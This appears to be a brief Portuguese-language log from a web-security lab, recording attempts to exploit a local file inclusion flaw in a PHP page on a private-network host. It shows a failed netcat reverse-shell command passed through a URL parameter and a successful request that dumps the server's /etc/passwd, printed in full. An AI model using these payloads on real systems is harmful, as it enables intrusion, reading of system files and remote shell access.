 
 unico comando que consegui resposta na falha LFI 
 
 tentei shell reverse com o nc mas sem sucesso
 http://192.168.1.18/lab/filei/lfi.php?page=cmd=nc -e /bin/sh 127.0.0.1 69
 
 http://192.168.1.18/lab/filei/lfi.php?file=/etc/passwd
 
 Conteudo do arquivo solicitado:
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/bin/sh
 man:x:6:12:man:/var/cache/man:/bin/sh
 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
 mail:x:8:8:mail:/var/mail:/bin/sh
 news:x:9:9:news:/var/spool/news:/bin/sh
 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
 proxy:x:13:13:proxy:/bin:/bin/sh
 www-data:x:33:33:www-data:/var/www:/bin/sh
 backup:x:34:34:backup:/var/backups:/bin/sh
 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
 libuuid:x:100:101::/var/lib/libuuid:/bin/sh
 Debian-exim:x:101:104::/var/spool/exim4:/bin/false
 statd:x:102:65534::/var/lib/nfs:/bin/false
 sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
 webxlabs:x:1000:1000:WebXLabs,,,:/home/webxlabs:/bin/bash
 mysql:x:104:107:MySQL Server,,,:/nonexistent:/bin/false
 messagebus:x:105:108::/var/run/dbus:/bin/false
 tomcat6:x:106:109::/usr/share/tomcat6:/bin/false
 
